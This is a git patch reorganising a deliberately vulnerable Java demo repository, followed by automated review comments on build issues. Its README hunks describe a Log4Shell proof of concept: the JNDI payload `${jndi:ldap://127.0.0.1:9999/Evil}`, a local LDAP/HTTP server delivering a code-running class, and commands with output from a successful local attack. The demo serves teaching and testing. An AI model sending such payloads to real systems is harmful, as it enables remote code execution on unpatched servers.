From 29b3e0299a4e5f86dd5d985ba11fd808c84f27b2 Mon Sep 17 00:00:00 2001 From: Micah Silverman Date: Thu, 16 Dec 2021 15:24:57 -0500 Subject: [PATCH] broke dependency of child modules on root parent. moved Dockerfile into todolist-goof module. Updated todolist poms to reference correct versions in dependencies. --- README.md | 100 +----------------- log4shell-goof/README.md | 13 ++- .../classes/Server$OperationInterceptor.class | Bin 3159 -> 3141 bytes log4shell-goof/pom.xml | 6 -- Dockerfile => todolist-goof/Dockerfile | 4 +- todolist-goof/README.md | 2 +- todolist-goof/pom.xml | 6 -- todolist-goof/todolist-web-common/pom.xml | 2 +- todolist-goof/todolist-web-struts/pom.xml | 2 +- 9 files changed, 18 insertions(+), 117 deletions(-) rename Dockerfile => todolist-goof/Dockerfile (66%) diff --git a/README.md b/README.md index dc5bb06062..b9e44272f0 100644 --- a/README.md +++ b/README.md 
@@ -1,98 +1,8 @@ -## Log4Shell Proof of Concept +## Java Goof -The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`. +This is a collection of Java demo apps that are vulnerable in different ways. -This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/). -The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo. +It's divided into modules, each one having its own README: -For more information about the exploit and the mechanics of how it works, -[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/). - -### Requirements - -You'll need one of the following Java SDKs: - * 11.0.1 or earlier - * 8u191 or earlier - * 7u201 or earlier - * 6u211 or earlier - -Java SDKs newer than those versions don't have the same vulnerability. - -### Building the PoC - -In the root folder, run: - -``` -./mvnw clean install -``` - -**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven. - -### Running the PoC - -This repo has two modules: server and client. - -The server module runs a lean LDAP & HTTP server. - -The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a -Java class that will be deserialized and executed. - -The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`. - -`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While -the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it -writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine. - -This PoC should run as-is on Linux or Mac. 
- -Open a terminal window and run the following: - -``` -cd log4shell-server -../mvnw exec:java -Dexec.mainClass="Server" -``` - -You should see output that looks like the following: - -``` -[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server --- -LDAP server listening on 0.0.0.0:9999 -HTTP server listening on 0.0.0.0:8000 -``` - -In another terminal window, run the following: - -``` -cd log4shell-client -JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \ -../mvnw exec:java -Dexec.mainClass="Main" -``` - -**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions. -For example, you can download JDK 8u111 -[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download -and install the version for Mac, the above command will work for you. - -You should see output that looks like the following: - -``` -[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client --- ----------- JVM Props ------------- -java.vm.version=25.111-b14 -java.vm.vendor=Oracle Corporation -java.vm.name=Java HotSpot(TM) 64-Bit Server VM -java.vm.specification.name=Java Virtual Machine Specification -java.vm.specification.vendor=Oracle Corporation -java.vm.specification.version=1.8 -java.vm.info=mixed mode ---------------------------------- -20:27:49.676 [Main.main()] ERROR Main - test -/tmp/pwned DOES NOT EXIST -20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil} -/tmp/pwned EXISTS - yah been pwned! -``` - -**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the -`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the -client app to work properly. The file not being there and then being present after the attack is how it knows it's -been successful. 
\ No newline at end of file +* [Todolist Goof](todolist-goof/README.md) +* [Log4Shell Goof](log4shell-goof/README.md) diff --git a/log4shell-goof/README.md b/log4shell-goof/README.md index b08c620530..d5552faabc 100644 --- a/log4shell-goof/README.md +++ b/log4shell-goof/README.md @@ -1,7 +1,10 @@ -## Log4Shell Proof of Concept +## Log4Shell Goof The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`. +This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/). +The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo. + For more information about the exploit and the mechanics of how it works, [here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/). @@ -20,7 +23,7 @@ Java SDKs newer than those versions don't have the same vulnerability. In the root folder, run: ``` -./mvnw clean install +mvn clean install ``` **NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven. @@ -46,7 +49,7 @@ Open a terminal window and run the following: ``` cd log4shell-server -../mvnw exec:java -Dexec.mainClass="Server" +mvn exec:java -Dexec.mainClass="Server" ``` You should see output that looks like the following: @@ -62,7 +65,7 @@ In another terminal window, run the following: ``` cd log4shell-client JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \ -../mvnw exec:java -Dexec.mainClass="Main" +mvn exec:java -Dexec.mainClass="Main" ``` **NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions. 
@@ -92,4 +95,4 @@ java.vm.info=mixed mode **NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the `/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the client app to work properly. The file not being there and then being present after the attack is how it knows it's -been successful. \ No newline at end of file +been successful. 
diff --git a/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class b/log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class index 7deca812035e69eacfc8eefbf9b290ab816162cc..9eca5167dc2a970503f4a4d250b27b53df737711 100644 GIT binary patch delta 1422 diff --git a/log4shell-goof/pom.xml b/log4shell-goof/pom.xml index e902f400a4..6eb158372a 100644 --- a/log4shell-goof/pom.xml +++ b/log4shell-goof/pom.xml @@ -2,12 +2,6 @@ 4.0.0 - - java-goof - io.github.snyk - 1.0-SNAPSHOT - - io.snyk log4shell-poc 0.0.1-SNAPSHOT 
diff --git a/Dockerfile b/todolist-goof/Dockerfile similarity index 66% rename from Dockerfile rename to todolist-goof/Dockerfile index 1e9063df6e..d37dfaeafa 100644 --- a/Dockerfile +++ b/todolist-goof/Dockerfile @@ -8,7 +8,7 @@ RUN --mount=target=$HOME/.m2,type=cache mvn install FROM tomcat:8.5.21 RUN mkdir /tmp/extracted_files -COPY --chown=tomcat:tomcat todolist-goof/web.xml /usr/local/tomcat/conf/web.xml -COPY --from=build /usr/src/goof/todolist-goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist +COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml +COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar diff --git a/todolist-goof/README.md b/todolist-goof/README.md index 9e03f33bba..c458877c4d 100644 --- a/todolist-goof/README.md +++ b/todolist-goof/README.md @@ -1,4 +1,4 @@ -## Java Goof +## Todolist Goof A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). diff --git a/todolist-goof/pom.xml b/todolist-goof/pom.xml index 5753769164..4df79d1b1b 100644 --- a/todolist-goof/pom.xml +++ b/todolist-goof/pom.xml @@ -2,12 +2,6 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - - java-goof - io.github.snyk - 0.0.1-SNAPSHOT - - io.github.snyk todolist-mvc 0.0.1-SNAPSHOT diff --git a/todolist-goof/todolist-web-common/pom.xml b/todolist-goof/todolist-web-common/pom.xml index 25f60795b9..59b055ec94 100644 --- a/todolist-goof/todolist-web-common/pom.xml +++ b/todolist-goof/todolist-web-common/pom.xml @@ -38,7 +38,7 @@ io.github.snyk todolist-core - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT 
diff --git a/todolist-goof/todolist-web-struts/pom.xml b/todolist-goof/todolist-web-struts/pom.xml index 60ea931624..54a356000b 100644 --- a/todolist-goof/todolist-web-struts/pom.xml +++ b/todolist-goof/todolist-web-struts/pom.xml @@ -21,7 +21,7 @@ javaee-web-api - 1.0-SNAPSHOT + 0.0.1-SNAPSHOT
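Review bot: in the README.md hunk (@@ -1,98 +1,8 @@) the new root README lists the two modules but says nothing about how they are built now that, per the commit message, the child poms no longer inherit from the root parent; one sentence saying that each module is built on its own with `mvn clean install` inside its directory (or that the root pom is still the build entry point, if it is) would spare the next reader a failed build from the repository root.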
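Review bot: in the log4shell-goof/README.md hunks at @@ -20,7 +23,7 @@, @@ -46,7 +49,7 @@ and @@ -62,7 +65,7 @@ the commands switch from `./mvnw` to `mvn`, but the retained context line `**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.` is now wrong; either keep a wrapper inside `log4shell-goof/` and go back to `./mvnw`, or delete that note and state that Maven must be installed. The context line `In the root folder, run:` should also name the `log4shell-goof` folder, since the module no longer builds as part of the repository root.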
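Review bot: the diff for `log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class` commits a compiled class from the Maven `target/` directory; build output cannot be reviewed as a binary delta and will churn on every build, so drop it from the commit with `git rm --cached`, add `target/` to `.gitignore`, and let the class be produced by `mvn clean install` as the README already describes.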
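Review bot: in the log4shell-goof/pom.xml hunk (@@ -2,12 +2,6 @@) the removed parent block (tags are stripped in this view; the removed values are `java-goof`, `io.github.snyk`, `1.0-SNAPSHOT`) took with it whatever the module inherited from the root pom, such as properties, `dependencyManagement` pins and plugin configuration; check that the module's own pom now declares the compiler level and the Log4j version it relies on, otherwise the demo may no longer resolve the pre-`2.15.0` Log4j that its README promises. The retained groupId `io.snyk` also differs from the `io.github.snyk` used by the todolist modules; pick one.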
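Review bot: in the todolist-goof/Dockerfile hunk (@@ -8,7 +8,7 @@) the `COPY` sources are now relative to `todolist-goof/` and the build stage copies from `/usr/src/goof/todolist-web-struts/target/todolist`, so the image must be built with `todolist-goof` as the Docker build context; neither README touched in this commit says so, and a `docker build` run from the repository root will fail at the first `COPY`. State the build command once in todolist-goof/README.md.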
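Review bot: in the todolist-goof/pom.xml hunk (@@ -2,12 +2,6 @@) the removed parent reference pointed at `0.0.1-SNAPSHOT` while the one removed from log4shell-goof/pom.xml pointed at `1.0-SNAPSHOT` of the same `java-goof` parent, which is consistent with the broken builds the commit message describes; the root pom itself is not in this diff, so confirm whether it still aggregates both modules (aggregation without inheritance is fine in Maven) or should be removed, and make the root README match whichever it is.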
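Review bot: in the todolist-goof/todolist-web-common/pom.xml hunk (@@ -38,7 +38,7 @@) the `todolist-core` dependency version is hard-coded to `0.0.1-SNAPSHOT` to match the module version set in todolist-goof/pom.xml; since the modules are siblings in the same build, `${project.version}` would keep them in step and stop the mismatch this commit fixes from recurring at the next version bump.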
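Review bot: in the todolist-goof/todolist-web-struts/pom.xml hunk (@@ -21,7 +21,7 @@) the changed version line sits directly after `javaee-web-api` in this tag-stripped view; `javaee-web-api` is a third-party artifact that would never be `0.0.1-SNAPSHOT`, so confirm the edited line belongs to the following internal module dependency, and use `${project.version}` there for the same reason as in todolist-web-common.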